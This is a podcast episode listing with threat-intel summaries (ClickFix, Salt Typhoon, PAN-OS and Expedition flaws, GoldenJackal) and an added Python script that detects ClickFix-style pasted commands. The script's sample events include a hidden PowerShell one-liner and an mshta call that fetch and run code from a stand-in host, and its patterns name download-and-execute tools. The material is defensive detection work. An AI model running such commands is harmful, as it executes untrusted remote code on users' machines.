The Cybersecurity Defenders Podcast

LimaCharlie
Nov 28, 2024 • 43min

#173 - Intel Chat: ClickFix, Raspberry Robin, Gelsemium, Fancy Bear & Salt Typhoon

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.

In recent months, cybersecurity researchers have observed a surge in the use of a social engineering technique known as "ClickFix." Threat actors present users with deceptive error messages that tell them to fix the problem themselves, typically by copying a command and pasting it into the Windows Run dialog or a terminal. Because the victim executes the script with their own hands, no exploit is involved and the resulting process activity can look like ordinary administration.

Raspberry Robin, also known as Roshtyak, is a heavily obfuscated malware family first discovered in 2021, notable for its complex binary structure and advanced evasion techniques. It spreads primarily via infected USB devices and uses multi-layered execution to obscure its true purpose.

Gelsemium, a China-linked Advanced Persistent Threat (APT) group, has been observed targeting Linux systems for the first time, deploying previously undocumented malware in an espionage campaign. Historically known for targeting Windows, the group's shift to Linux may be driven by the increasing hardening of Windows systems.

Russia's APT28 hacking group, also known as Fancy Bear or GRU Unit 26165, has developed a novel technique dubbed the "nearest neighbor attack" for reaching a target's Wi-Fi network without being physically nearby: the attackers compromise a neighboring organization and use one of its Wi-Fi-capable devices to connect to the target's wireless network from across the street.

Hackers linked to the Chinese government, tracked as Salt Typhoon, have deeply infiltrated U.S. telecommunications infrastructure, gaining the ability to intercept unencrypted phone calls and text messages. The group exploited vulnerabilities in the lawful-interception (wiretap) systems that carriers operate for U.S. authorities, in what Senator Mark Warner has called "the worst telecom hack in our nation's history."
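The ClickFix item above comes down to one observable: a scripting host launched by the user's own shell or browser with a paste-and-run style command line. The following detection logic, added here as an illustration and not code from the podcast or from LimaCharlie, scores constructed process-creation events shaped like Sysmon Event ID 1 records (Image, ParentImage, CommandLine, ProcessId). The parent-process list, regex patterns and alert threshold are assumptions a real deployment would tune against its own baseline; the sample events are constructed, not real telemetry.

```python
"""ClickFix-style execution detection over constructed process-creation events.

Added example, not code from the podcast or from LimaCharlie. The events below
are constructed to resemble Sysmon Event ID 1 fields; they are not real
telemetry. Patterns, parent lists and the threshold are tuning assumptions.
"""
import re

# Scripting hosts and LOLBins that ClickFix lures typically tell the victim to run.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Parents that imply a human launched the command (Win+R Run dialog, Explorer
# address bar, or a browser) rather than a service, scheduler or installer.
USER_DRIVEN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line traits common to pasted lures; each regex counts once if it matches.
SUSPICIOUS_CMDLINE = [re.compile(p, re.IGNORECASE) for p in (
    r"-(?:w|windowstyle)\s+hidden",                        # hide the console
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", # base64 payload
    r"\b(?:iex|invoke-expression)\b",                      # run fetched text
    r"\b(?:iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b",
    r"downloadstring|downloadfile",                        # .NET WebClient fetch
    r"mshta(?:\.exe)?\s+https?://",                        # remote .hta
    r"i am not a robot|recaptcha|verification id",         # fake CAPTCHA banner
)]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; higher means more ClickFix-like."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    if image not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in USER_DRIVEN_PARENTS:
        score += 2
        reasons.append(f"{image} launched from {parent} (user-driven)")
    for rx in SUSPICIOUS_CMDLINE:
        m = rx.search(ev["CommandLine"])
        if m:
            score += 1
            reasons.append(f"cmdline matches /{rx.pattern}/: {m.group(0)!r}")
    return score, reasons


def detect(events: list[dict], threshold: int = 3) -> list[dict]:
    """Return alerts for events scoring at or above threshold.

    The default requires a user-driven parent plus at least one suspicious
    command-line trait, so a user merely opening PowerShell from the Run dialog
    does not fire, while a hidden, downloading, in-memory command does.
    """
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"ProcessId": ev["ProcessId"], "score": score,
                           "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},                    # user just opened a shell
    {"ProcessId": 4812, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/v | iex" '
                    "# I am not a robot - reCAPTCHA Verification ID: 7624"},
    {"ProcessId": 5120,
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ProcessId": 6033, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["score"], *alert["reasons"], sep="\n  ")
```

Run against the sample, the pasted PowerShell one-liner and the browser-launched mshta fetch fire; the plain interactive shell and the scheduled backup script do not. Process lineage alone is weak evidence here (users open terminals from Explorer all day), which is why the parent only adds weight and the command-line traits decide. On Windows hosts the Run dialog also records what was typed under the RunMRU registry key, which is worth pulling during triage to recover the exact pasted command.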
Nov 27, 2024 • 35min

#172 - Cybercrime cottage industries with Reed McGinley-Stempel, the Co-Founder and CEO of Stytch

On today's episode of The Cybersecurity Defenders Podcast we talk about cybercrime cottage industries with Reed McGinley-Stempel, the Co-Founder and CEO of Stytch.

Stytch is a platform designed to streamline authentication, authorization, and fraud prevention in a way that enhances security while minimizing user friction. Stytch serves both consumer and B2B applications, offering a variety of authentication solutions, including features like Google One Tap and biometrics for consumer-facing applications, as well as SSO, role-based access control, and SCIM integrations for enterprise SaaS. Reed founded Stytch after witnessing the challenges teams face when building secure and user-friendly authentication, a problem he first encountered while working at Plaid. He is also a proud Duke alumnus and a recipient of the Fulbright Scholarship.
Nov 23, 2024 • 43min

#171 - Intel Chat: Snowflake, Scattered Spider, CCP, Melofee backdoor, SilkSpecter & Palo Alto Networks

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.

U.S. authorities have identified and charged individuals responsible for a significant data breach involving Snowflake Inc., a major cloud data warehousing company. The breach resulted in the theft of approximately 50 billion records from AT&T, one of Snowflake's prominent customers.

U.S. prosecutors have charged five individuals, including 22-year-old Scottish national Tyler Buchanan, for their alleged involvement in the cybercrime group Scattered Spider. The group is accused of executing sophisticated phishing attacks that compromised numerous U.S. companies and individuals, leading to the theft of confidential information and cryptocurrency.

The next item is a breakdown of the evolving landscape of Chinese state-sponsored cyber threats, which reveals a highly coordinated, multi-layered approach to achieving the strategic objectives of the Chinese Communist Party (CCP).

In July 2024, cybersecurity researchers identified a new variant of the Melofee backdoor, a sophisticated malware family associated with the Winnti Advanced Persistent Threat group. This variant specifically targets Red Hat Enterprise Linux 7.9 systems and demonstrates enhanced stealth and persistence mechanisms.

In early October 2024, cybersecurity analysts identified a phishing campaign targeting e-commerce shoppers in Europe and the USA seeking Black Friday discounts. The campaign, attributed to a financially motivated Chinese threat actor dubbed "SilkSpecter," exploited the surge in online shopping during November's Black Friday season.

Palo Alto Networks' Unit 42 has identified exploitation activity targeting two critical vulnerabilities in PAN-OS: CVE-2024-0012, an authentication bypass in the management web interface, and CVE-2024-9474, a privilege escalation, which attackers have chained to gain root on the firewall. The exposure only exists where the management interface is reachable from untrusted networks, so restricting it to trusted internal addresses, as Palo Alto Networks has long recommended, removes the attack path even before patching.
Nov 19, 2024 • 29min

#170 - A novel path into cybersecurity with Jibby Saetang, Security Researcher with Microsoft GHOST

On this episode of The Cybersecurity Defenders Podcast we speak with Jibby Saetang, Security Researcher with Microsoft GHOST, about his novel path to a career in cybersecurity.

With over a decade of experience in watch and jewelry repair, Jibby developed an impressive eye for detail and a knack for solving complex problems. These skills translated seamlessly into the world of cybersecurity, where Jibby found an unexpected yet perfect fit. Driven by a passion for learning, Jibby dove into the KC7 platform, an immersive cybersecurity training resource, which ultimately led to a role at Microsoft, all without taking the traditional certification route. Jibby's story is a testament to the power of persistence, passion, and non-traditional paths in tech. Now, Jibby is focused on helping others break into cybersecurity by developing new KC7 training modules, aiming to inspire and equip the next generation of problem-solvers.
Nov 15, 2024 • 38min

#169 - Intel Chat: Tools, N. Korean IT workers, GootLoader, FakeBat & Pacific Rim

Matt Bromley, a cybersecurity expert, dives into the latest threats and tools shaping the landscape. He explains how the MFASweep PowerShell script enumerates which Microsoft 365 login endpoints accept a given credential without multi-factor authentication, letting defenders find the MFA gaps attackers look for first. The CVE2CAPEC tool maps CVEs to their CWE weaknesses and CAPEC attack patterns, helping researchers reason about how a vulnerability is likely to be attacked. Bromley discusses the unsettling trend of North Korean IT workers infiltrating Western companies and highlights narrowly targeted malware campaigns, like GootLoader using poisoned search results about Bengal cats to reach a very specific audience, stressing the urgency for user education and collaboration in cybersecurity.
Oct 31, 2024 • 35min

#168 - Intel Chat: Latrodectus, WarmCookie, FortiManager, EU's Product Liability Directive & Linus Torvalds

Matt Bromley, a cybersecurity expert, dives into the latest threats and vulnerabilities. He discusses the evolution of the Latrodectus malware, noting its sophisticated evasion techniques. The conversation highlights a critical zero-day vulnerability in FortiManager, underlining the urgency of patching and of keeping management planes off the internet. Bromley also examines the EU's updated Product Liability Directive, which extends product liability to software and aims to better protect consumers in the digital age. Lastly, he touches upon the controversial removal of several Russia-based maintainers from the Linux kernel's MAINTAINERS file, raising questions about geopolitics and open source governance.
Oct 30, 2024 • 37min

#167 - Running an MDR company with Joshua Sitta, Co-Founder and CTO at Sittadel

On this episode of The Cybersecurity Defenders Podcast we talk about running an MDR company with Joshua Sitta, Co-Founder and CTO at Sittadel.

Joshua Sitta is the co-founder and CTO of Sittadel, a cybersecurity company specializing in 24/7/365 Managed Detection and Response services. With a focus on enterprise-grade EDR solutions, Sittadel provides comprehensive cybersecurity monitoring and incident response. Before founding Sittadel, Joshua served as the Director of Enterprise Security Architecture at SouthState Bank, where he built a robust in-house cybersecurity program that safeguarded billions in assets. He brings deep expertise in protecting organizations from modern cyber threats.
Oct 24, 2024 • 30min

#166 - Intel Chat: Microsoft logs, USDoD, SolarWinds WHD, & CISA KEV

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.

Microsoft has confirmed that a software bug caused the loss of more than two weeks' worth of security logs from several of its cloud services. Defenders who rely on those logs have a blind spot for that window and should not read the absence of alerts during it as the absence of activity.

Brazil's Federal Police have arrested a hacker suspected to be "USDoD," a notorious cybercriminal involved in several high-profile data breaches.

A critical vulnerability has been discovered in SolarWinds' Web Help Desk (WHD) software, involving hardcoded credentials that an attacker could use to reach internal functionality without a legitimate account.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added several critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, signaling that these flaws are being actively used in attacks and should be prioritized ahead of vulnerabilities that merely carry a high CVSS score.
Oct 23, 2024 • 30min

#165 - How AI is revolutionizing compliance with Dr. Gaurav Banga, CEO of Balbix

On this episode of The Cybersecurity Defenders Podcast we examine how AI is revolutionizing compliance with Dr. Gaurav Banga, CEO of Balbix.

Gaurav Banga is the CEO and Founder of Balbix, an AI-powered cybersecurity risk management startup. Gaurav is an accomplished inventor with over 50 patents to his name, and he has a deep background in founding and leading multiple successful tech ventures. His journey into entrepreneurship is unique: it began over a decade ago when he was inspired by a book that eventually led him to leave academia and pursue his passion for deep tech. Gaurav regularly speaks with CISOs, gaining firsthand insight into their biggest challenges as they navigate an increasingly complex cybersecurity landscape. As regulatory scrutiny around security disclosures intensifies, Gaurav offers a unique perspective on how AI can reshape the future of risk management, helping organizations strike the right balance between innovation and security.
Oct 21, 2024 • 41min

#164 - Intel Chat: Wazuh, .io, AI, Discord, Palo Alto & GoldenJackal

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.

A recent malware campaign has been discovered that abuses the open-source Wazuh SIEM agent, a legitimate and often allowlisted binary, to deliver a cryptomining payload.

There is uncertainty surrounding the .io domain following the UK's decision to return the Chagos Islands, which make up the British Indian Ocean Territory, to Mauritius. The .io country-code TLD is assigned to that territory, and if its ISO 3166 code is retired the TLD could in principle be retired with it.

OpenAI's October 2024 report, "Influence and Cyber Operations," explores how AI is being leveraged by both state and non-state actors in cyber campaigns. Key findings show that AI tools are increasingly being used to enhance traditional cyberattacks, particularly in areas like vulnerability research, malware debugging, and influence operations.

Discord has recently been blocked in both Russia and Turkey due to claims of illegal activity on the platform.

Palo Alto Networks recently patched several critical vulnerabilities in its Expedition migration tool, which could allow attackers to take control of firewall systems. The most severe flaw, CVE-2024-9463, is an OS command injection that allows unauthenticated attackers to execute arbitrary OS commands as root, exposing sensitive data such as usernames, passwords, device configurations and API keys for the PAN-OS firewalls Expedition manages. Expedition is a migration utility rather than a production service, so it should never be reachable from the internet; restricting network access to it is the first mitigation, patching the second.

An article from ESET highlights a cyberespionage campaign conducted by a group known as GoldenJackal, which targets government and diplomatic entities and focuses specifically on air-gapped systems in regions such as Europe, the Middle East, and South Asia, using custom toolsets carried across the air gap on USB drives.
